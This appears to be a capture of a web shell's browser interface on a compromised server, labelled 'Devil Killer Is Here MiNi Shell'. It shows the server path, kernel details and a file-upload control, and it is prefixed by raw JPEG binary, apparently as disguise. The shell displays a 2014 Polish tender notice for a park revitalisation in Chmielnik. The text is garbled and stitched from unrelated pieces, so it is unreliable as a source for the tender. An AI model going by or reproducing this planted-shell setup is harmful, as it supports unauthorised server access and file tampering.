JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141217/260287-N-2014.html

<p class="kh_header"><b>Chmielnik: Rewitalizacja parku miejskiego pomiędzy ulicami Dygasińskiego i Żeromskiego 
w Chmielniku</b><br>
<b>Numer ogłoszenia: 260287 - 2014; data zamieszczenia: 17.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chmielnik , Plac Kościuszki 7, 26-020 Chmielnik, woj. świętokrzyskie, tel. 41 3543273, faks 41 3543273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chmielnik.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja parku miejskiego pomiędzy ulicami Dygasińskiego i Żeromskiego 
w Chmielniku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa parku miejskiego pomiędzy ulicami Dygasińskiego i Żeromskiego w Chmielniku. Zamówienie  obejmuje:
1. Rozebranie  budynku - domu Rzezaka, ogrodzenia oraz nawierzchni parkowych z podbudową, konserwacja fragmentu ruin domu Rzezaka poprzez impregnację i wykonanie szczelnych spoin. Na pozostałym fragmencie domu Rzezaka należy umieścić tablicę informacyjną z plexi o grub. 1 cm. Treść należy uzgodnić z Zamawiającym.
2. Karczowanie drzew i nasadzenie nowego drzewostanu. 
3. Budowę zbiornika wodnego z siecią drenarską,
4. Budowę oświetlenia parku - latarnie parkowe: słupy stalowe ocynkowane  na fundamencie z oprawą kulową mleczną z lampami ledowymi o barwie ciepłej  i mocy 60 W oraz wzdłuż ulicy Parkowej latarnie drogowe z wysięgnikami o wys. 7 m z lampami ledowymi o barwie ciepłej i mocy 60 W (Zamawiający dokonuje zamiany  zaprojektowanych lamp sodowych na ledowe.) Przebudowa istniejącego punktu sterowniczo - pomiarowego.
5. Budowę stanowisk postojowych przy ul. Parkowej oraz przy ul. Dygasińskiego z kostki betonowej kolor szary i płyt ażurowych - 49 stanowisk wraz z chodnikiem w kolorze żółtym. 
6. Ukształtowanie terenu pod alejkę rowerowo - rolkową  i nasyp ( górkę) z obsianiem trawą.
7. Nawierzchnie parkowe: 
- ścieżka rowerowo - rolkowa o nawierzchni asfaltowej na podbudowie z kruszywa łamanego (15 cm) i piasku (20 cm). 
- alejki parkowe o nawierzchni mineralno - żywicznej w kolorze piaskowym na podbudowie z kruszywa łamanego gr. 10 cm. i warstwie piasku o gr. 20 cm wykończone obrzeżem betonowym. Spoiwo wykonane poprzez wymieszanie komponentów w odpowiednim stosunku wagowym. Wymieszanie masy z kruszywem w mieszarce w wymuszonym mieszaniem zarobu. Wylanie warstwy wierzchniej z zacieraniem mechanicznym.
- nawierzchnia placu zabaw z mieszanki mineralno - żywicznej oraz nawierzchnia bezpieczna pod urządzeniami zabawowymi z płyt gumowych EPDM o grub. 3 cm układanych na podbudowie z kruszywa ( 10cm) i piasku ( 20 cm). 
8. Plac zabaw z urządzeniami zabawowymi typu:
- zestaw zabawowy typu śpioszek: wieża kwadratowa z daszkiem x2, wieża strażacka, zjeżdżalnia , kładka linowa, most linowy, ścianka linowa - pajęczyna, komin linowy, koci grzbiet, ścianka wspinaczkowa - wejście. 
- karuzela - młynek z siedziskami,
-zestaw zabawowy integracyjny typu labirynt naukowca: kółko i krzyżyk, sklepik, tablica do rysowania, termometr, zegar. 
- huśtawka wagowa, 
- zestaw baszta z piaskownicą: wieża z dachem 4-spadowym, ślizg krótki, podest stały, podest - platforma, piaskownica z siedziskami, wieża bez dachu, trap wjazdowy, wyposażenie dodatkowe: moduł kółko-krzyżyk, tablica do rysowania.
-  sprężynowiec duo,
- huśtawka bocianie gniazdo: belka pozioma wykonana ze stali ocynkowanej, słupy wykonane z drewna litego, posadowione na stopach stalowych ocynkowanych, zakotwione w gruncie przez zabetonowanie. Zawiesia łożyskowane wykonane ze stali nierdzewnej. Bocianie gniazdo wykonane z lin.
- krzyżak mały / mrowisko: wykonane z 25 drewnianych słupów o długości 3,60 m zakotwionych w zbrojonej płycie fundamentowanej oraz 40 poziomych, stalowych, ocynkowanych rur. Słupy wykonane z drewna litego, posadowione na stopach stalowych ocynkowanych zakotwionych w płycie fundamentowej.
- linarium typu piramida/stożek o wys. 4 m,
- zjazd linowy o długości 25 m z podestem: konstrukcja nośna wykonana ze stali malowanej proszkowo. 
Podpory przednie wykonane z profilu 70x70x3mm, podpora tylna wykonana z profilu 90x90x4mm.
Pomosty startowe wykonane z drewna bezrdzeniowego. Ruchomy wózek ze stali nierdzewnej poruszający się po stalowej linie łączącej metalowe elementy nośne. Urządzenie zakotwione w gruncie przy użyciu betonu.
- stolik dziecięcy z siedziskami ( typu rys. p02): siedziska i blat stolika na jednym stelażu metalowym, przytwierdzony do podłoża.
-tablica informacyjna / regulaminowa na plac zabaw. Konstrukcja metalowa lub drewniana zakotwiona na kotwach metalowych. 
W projekcie przedstawiono przykładowe rysunki urządzeń stanowiących projektowane wyposażenie terenu.

9. Siłownia terenowa z urządzeniami typu: 
a) urządzenia jednostanowiskowe: 
- orbitek, 
- twister, 
- wahadło, 
- prasa nożna, 
- biegacz, 
- poręcze,
- drążek uniwersalny, 
- wioślarz,  
b) Urządzenia  dwustanowiskowe ( zestawy przykładowe, Wykonawca może zaproponować inne połączenia urządzeń): 
- ławki do ćwiczeń na pylonie , 
- przywodziciel - odwodziciel na pylonie,
- prasa ręczna - wyciąg górny na pylonie, 
-prasa ręczna - prasa nożna na pylonie, 
- motyl A - wyciąg górny na pylonie, 
- poręcz - drabinka na pylonie.
Masywne metalowe przyrządy wykonane z grubej stali nierdzewnej. Urządzenia o konstrukcji nośnej wykonanej ze stalowych rur o przekroju co najmniej 11 cm i grubości co najmniej 3,6 mm. Kryzy montażowe o grubości 8 mm. Poręcze i uchwyty wykonane z rur stalowych o grubości co najmniej 3 mm. Siedziska, oparcia i stopnie wykonane z blachy ze stali nierdzewnej grubości co najmniej 3 mm z otworami odprowadzającymi wodę, dodatkowo malowane proszkowo trwałymi farbami do użytku zewnętrznego gwarantującymi odporność na korozję, działanie promieni słonecznych i zmiany temperatur. Urządzenia zamontowane na fundamentach betonowych minimum 30 cm pod powierzchnią gruntu zamontowane za pomocą kotwy stalowej zalanej w betonie.
Urządzenia podwójne montowane na pylonie zawierającym instrukcje użytkowania urządzeń. Każde z urządzeń wyposażone w tabliczkę znamionową z funkcją i instrukcją do ćwiczeń.

10. Ogrodzenie:
- placu zabaw ze stali ocynkowanej: kształtowniki w ramach stalowych z bramą i furtkami o wys.1,2m - 61 mb, 
- ogrodzenie stalowe, ocynkowane przy budynku rzeźni  o wys. 1,63 m  - 59,5 mb.
- ogrodzenie zbiornika wodnego wykonane częściowo na fundamencie betonowym  i cokole murowanym z kamienia, konstrukcja wykonana z rur stalowych ocynkowanych fi 40 mm, bariera o wys. 1,1 m. Ogrodzenie oczka wodnego - 39,2 mb i barierka 21,4 mb.
11. Zakup i montaż w parku elementów małej architektury typu: ławki parkowe ( 20 szt. z oparciem i 36 szt. bez oparcia), stoły, tablica informacyjna, kosze na odpady, stojaki na rowery, bramy wejściowe do parku z napisem i reliefem. 
12. Zazielenienie terenu, nasadzenie roślin, drzew, krzewów i bylin. 
Do nasadzenia należy wycenić:
-  drzewa wysokie typu: platan, lipa, dąb, kasztanowiec o wysokości co najmniej 3 metry od powierzchni gruntu. Drzewa powinny być w pojemniku lub z bryłą ziemi, z dobrze wykształconą koroną i systemem korzeniowym.
- śliwa wiśniowa i złotokap o wysokości co najmniej 2,5 metra od powierzchni gruntu.
- sadzonki  krzewów o wysokości co najmniej 1,5 m, mocno rozkrzewiona korona i system korzeniowy. Drzewa i krzewy muszą być wolne od szkodników, zdrowe i nieuszkodzone.
Do utrzymania roślin w pozycji pionowej należy zastosować paliki wykonane z drewna, okorowane i impregnowane ciśnieniowo. Paliki wzmacniane półpalikami  bocznymi oraz taśmą PCV..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje na podstawie art. 67 ust.1 pkt.6 ustawy Prawo zamówień publicznych udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego zamówień uzupełniających stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.23.31.20-6, 45.31.00.00-3, 45.11.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 40 000,00 zł ( słownie: czterdzieści tysięcy zł 00/100)
Wadium może być wniesione w jednej lub kilku formach wymienionych w art. 45 ust. 6 Prawa zamówień publicznych tj:
1.	pieniądzu;
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.)
Wadium wniesione w pieniądzu wpłacać należy na rachunek bankowy Zamawiającego:
 BS Chmielnik 32 8483 0001 2001 0017 7441 0001.
Dowód wniesienia wadium w innej formie niż pieniądz należy włożyć do koperty z ofertą w osobnej koszulce ( nie wpinać trwale do oferty). Kserokopię wniesienia wadium bez względu na formę należy natomiast trwale wpiąć do oferty. Kserokopia ta winna być poświadczona za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.
Gwarancja wadialna nie może zawierać zastrzeżenia gwaranta, że pisemne żądanie zapłaty musi być przedstawione za pośrednictwem Banku prowadzącego rachunek zamawiającego, w celu potwierdzenia, że podpisy złożone na pisemnym żądaniu należą do osób uprawnionych do zaciągania zobowiązań majątkowych w imieniu Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni posiadać zarejestrowaną działalność gospodarczą w zakresie robót  budowlanych. Zamawiający dokona oceny na podstawie oświadczenia, o którym mowa w art. 44 ustawy PZP
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na podstawie analizy przedłożonych oświadczeń i dokumentów wymienionych w rozdziale VI specyfikacji wg formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
- zrealizował (zakończył) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  jedno zamówienie (potwierdzone dowodami, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone) polegające na wykonaniu roboty budowlanej w zakresie budowy, rozbudowy lub przebudowy obiektów rekreacyjnych typu: place zabaw, boiska, parki obejmujące wykonanie nawierzchni  z kostki i oświetlenia lub rewitalizację centrów miejscowości o wartości nie mniejszej niż 900 000,00 zł
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na podstawie analizy przedłożonych oświadczeń i dokumentów wymienionych w rozdziale VI specyfikacji wg formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na podstawie analizy przedłożonych oświadczeń i dokumentów wymienionych w rozdziale VI specyfikacji wg formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponować, w okresie przewidzianym na realizację zamówienia osobami o odpowiednich uprawnieniach zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r. 
w sprawie samodzielnych funkcji w budownictwie ( Dz. U. z 2006 r. Nr 83, poz.578
 ze zm.) :
- kierownikiem budowy - posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów;
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na podstawie analizy przedłożonych oświadczeń i dokumentów wymienionych w rozdziale VI specyfikacji wg formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach spełnienia w/w warunku należy wykazać posiadanie minimum 
1 000 000,00 zł ( słownie: jeden milion zł 00/100) środków finansowych lub posiadanie zdolności kredytowej wykonawcy w tej samej wysokości.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na podstawie analizy przedłożonych oświadczeń i dokumentów wymienionych w rozdziale VI specyfikacji wg formuły spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca wykaże, że:
- zrealizował (zakończył) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  jedno zamówienie (potwierdzone dowodami, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone) polegające na wykonaniu roboty budowlanej w zakresie budowy, rozbudowy lub przebudowy obiektów rekreacyjnych typu: place zabaw, boiska, parki obejmujące wykonanie nawierzchni  z kostki i oświetlenia lub rewitalizację centrów miejscowości o wartości nie mniejszej niż 900 000,00 zł;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   Formularz ofertowy Załącznik Nr 1 do SIWZ- wymagana forma - ORYGINAŁ	
2. Pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy - wymagana forma - ORYGINAŁ lub odpis pełnomocnictwa poświadczony za zgodność z oryginałem przez notariusza;
3. Kosztorys ofertowy uproszczony wraz z podaniem zastosowanych w kosztorysie czynników cenotwórczych - wymagana forma - ORYGINAŁ;
4. Oświadczenie o podwykonawcach - Załącznik nr 7 do SIWZ - wymagana forma - ORYGINAŁ;
5. Dowód wniesienia wadium - wymagana forma - zgodnie z zapisem działu VIII SIWZ (Dowód wniesienia wadium w innej formie niż pieniądz należy włożyć do koperty z ofertą w osobnej koszulce ( nie wpinać trwale do oferty). Kserokopię wniesienia wadium bez względu na formę należy natomiast trwale wpiąć do oferty).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji na wykonany przedmiot zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
